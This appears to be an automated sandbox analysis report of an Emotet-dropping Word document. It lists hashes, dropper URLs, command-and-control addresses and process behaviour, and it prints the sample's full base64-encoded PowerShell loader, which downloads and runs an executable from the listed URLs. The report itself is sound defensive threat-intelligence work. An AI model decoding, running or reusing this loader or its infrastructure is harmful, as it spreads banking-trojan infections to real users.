emotet | 58c574f8ab938e878c2d66861aa38821876dcb5a156c46ac9985a8b59f97bb8c

General

Target

SecuriteInfo.com.Exploit.Siggen2.12932.19584.10385.doc
Size

169KB
MD5

ad4dab090e9db1de2ce2972440becfa5
SHA1

f5bce1285800898458044ff22dd93e5795a5e92e
SHA256

58c574f8ab938e878c2d66861aa38821876dcb5a156c46ac9985a8b59f97bb8c
SHA512

87f4d9f18704cdfa8ff11610ef5ed945cb2b68a9c48ccebea363b29b10d1d8f8ecc0ffe4d13c3856c9be6ed6e9d811d7da3d0b613f7b06a4ef56f4eb4d3c96ce

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://mktf.mx/wp-includes/nf_p0w_z87k/

exe.dropper

http://dragonfang.com/nav/pu_4cz89_3e81ooa90c/

exe.dropper

http://maxiquim.cl/cgi-bin/qa0_i_qzk/

exe.dropper

https://www.planetkram.com/egherdbaseball/z_xu00_9hbk939elw/

exe.dropper

http://meulocal.com.br/suspend-page/0e_wt5bq_ekn/

Extracted

Family

emotet

C2

142.105.151.124:443

62.108.54.22:8080

212.51.142.238:8080

71.208.216.10:80

108.48.41.69:80

83.110.223.58:443

210.165.156.91:80

104.131.44.150:8080

104.236.246.93:8080

5.39.91.110:7080

209.141.54.221:8080

209.182.216.177:443

153.126.210.205:7080

91.211.88.52:7080

180.92.239.110:8080

183.101.175.193:80

162.241.92.219:8080

87.106.139.101:8080

114.146.222.200:80

65.111.120.223:80

rsa_pubkey.plain

Signatures

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmp	emotet
behavioral2/memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmp	emotet
behavioral2/memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmp	emotet
behavioral2/memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmp	emotet

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Drops file in System32 directory 1 IoCs

Processes:

14.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\sechost\Apphlpdm.exe 14.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 2324 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powersheLL.exeApphlpdm.exe

pid process

2324 powersheLL.exe
2324 powersheLL.exe
2324 powersheLL.exe
1336 Apphlpdm.exe
1336 Apphlpdm.exe
1336 Apphlpdm.exe
1336 Apphlpdm.exe
Executes dropped EXE 2 IoCs

Processes:

14.exeApphlpdm.exe

pid process

364 14.exe
1336 Apphlpdm.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

15 2324 powersheLL.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\sechost\Apphlpdm.exe	14.exe

description	pid	process
Token: SeDebugPrivilege	2324	powersheLL.exe

pid	process
2324	powersheLL.exe
2324	powersheLL.exe
2324	powersheLL.exe
1336	Apphlpdm.exe
1336	Apphlpdm.exe
1336	Apphlpdm.exe
1336	Apphlpdm.exe

pid	process
364	14.exe
1336	Apphlpdm.exe

flow	pid	process
15	2324	powersheLL.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

14.exe

description	pid	process	target process
PID 364 wrote to memory of 1336	364	14.exe	Apphlpdm.exe
PID 364 wrote to memory of 1336	364	14.exe	Apphlpdm.exe
PID 364 wrote to memory of 1336	364	14.exe	Apphlpdm.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

WINWORD.EXE14.exeApphlpdm.exe

pid	process
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
3100	WINWORD.EXE
364	14.exe
1336	Apphlpdm.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3100 WINWORD.EXE
3100 WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	3956	powersheLL.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12932.19584.10385.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:3100

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABWAEcASgBLAFgAbQB4AGUAPQAnAEQARQBWAFIAVgB4AGgAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBgAEkAdAB5AHAAcgBvAHQAbwBjAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEwASwBGAFIATQBkAHAAZAAgAD0AIAAnADEANAAnADsAJABBAEEASABOAFkAYgBuAGgAPQAnAFQAQgBNAE8AQgBhAGcAZwAnADsAJABGAFoAUgBWAEkAdQBtAHMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASwBGAFIATQBkAHAAZAArACcALgBlAHgAZQAnADsAJABWAEMARQBYAEUAbQBpAG8APQAnAFQATwBIAEsAWQBkAHEAYwAnADsAJABJAFoASwBYAEsAdwBzAHoAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBsAGkAZQBOAHQAOwAkAFYASQBDAFoAUgBzAHkAcgA9ACcAaAB0AHQAcAA6AC8ALwBtAGsAdABmAC4AbQB4AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBmAF8AcAAwAHcAXwB6ADgANwBrAC8AKgBoAHQAdABwADoALwAvAGQAcgBhAGcAbwBuAGYAYQBuAGcALgBjAG8AbQAvAG4AYQB2AC8AcAB1AF8ANABjAHoAOAA5AF8AMwBlADgAMQBvAG8AYQA5ADAAYwAvACoAaAB0AHQAcAA6AC8ALwBtAGEAeABpAHEAdQBpAG0ALgBjAGwALwBjAGcAaQAtAGIAaQBuAC8AcQBhADAAXwBpAF8AcQB6AGsALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAbABhAG4AZQB0AGsAcgBhAG0ALgBjAG8AbQAvAGUAZwBoAGUAcgBkAGIAYQBzAGUAYgBhAGwAbAAvAHoAXwB4AHUAMAAwAF8AOQBoAGIAawA5ADMAOQBlAGwAdwAvACoAaAB0AHQAcAA6AC8ALwBtAGUAdQBsAG8AYwBhAGwALgBjAG8AbQAuAGIAcgAvAHMAdQBzAHAAZQBuAGQALQBwAGEAZwBlAC8AMABlAF8AdwB0ADUAYgBxAF8AZQBrAG4ALwAnAC4AIgBTAGAAUABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE4AVABMAEkASwBlAGcAawA9ACcAUgBRAFUAUgBQAHIAYgBzACcAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8AUABEAEUAcwBiAG4AIABpAG4AIAAkAFYASQBDAFoAUgBzAHkAcgApAHsAdAByAHkAewAkAEkAWgBLAFgASwB3AHMAegAuACIARABvAHcAbgBgAEwAYABPAEEAZABgAEYASQBMAEUAIgAoACQATABPAFAARABFAHMAYgBuACwAIAAkAEYAWgBSAFYASQB1AG0AcwApADsAJABUAEMAVgBWAEUAawBnAHQAPQAnAEkASgBDAEoAWAB5AGkAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEYAWgBSAFYASQB1AG0AcwApAC4AIgBsAGAAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgA5ADYAMAA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBFAGEAYABUAEUAIgAoACQARgBaAFIAVgBJAHUAbQBzACkAOwAkAE4AUgBBAFEAVABmAHEAeAA9ACcAQwBaAFEASgBHAGUAeAB6ACcAOwBiAHIAZQBhAGsAOwAkAFMATwBCAEIAUQBtAHkAYgA9ACcASQBUAFYASgBXAGUAZwBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQATABDAFAATgBtAGYAcgA9ACcAUwBaAFcARQBBAHkAbABhACcA
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
PID:2324

C:\Users\Admin\14.exe
C:\Users\Admin\14.exe
1⤵
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:364

C:\Windows\SysWOW64\sechost\Apphlpdm.exe
"C:\Windows\SysWOW64\sechost\Apphlpdm.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\14.exe

Download Submit
C:\Users\Admin\14.exe

Download Submit
C:\Windows\SysWOW64\sechost\Apphlpdm.exe

Download Submit
memory/364-10-0x00000000006C0000-0x00000000006CC000-memory.dmp

Filesize
48KB

Download
memory/1336-13-0x0000000000660000-0x000000000066C000-memory.dmp

Filesize
48KB

Download
memory/1336-11-0x0000000000000000-mapping.dmp

Download
memory/3100-3-0x000001358E9E0000-0x000001358E9F1000-memory.dmp

Filesize
68KB

Download
memory/3100-7-0x000001358EBA7000-0x000001358EBAA000-memory.dmp

Filesize
12KB

Download
memory/3100-6-0x000001358EBAA000-0x000001358EBAF000-memory.dmp

Filesize
20KB

Download
memory/3100-5-0x000001358EBA7000-0x000001358EBAA000-memory.dmp

Filesize
12KB

Download
memory/3100-0-0x000001358E9E0000-0x000001358E9F1000-memory.dmp

Filesize
68KB

Download
memory/3100-2-0x000001358E9E0000-0x000001358E9F1000-memory.dmp

Filesize
68KB

Download
memory/3100-1-0x000001358E9E0000-0x000001358E9F1000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads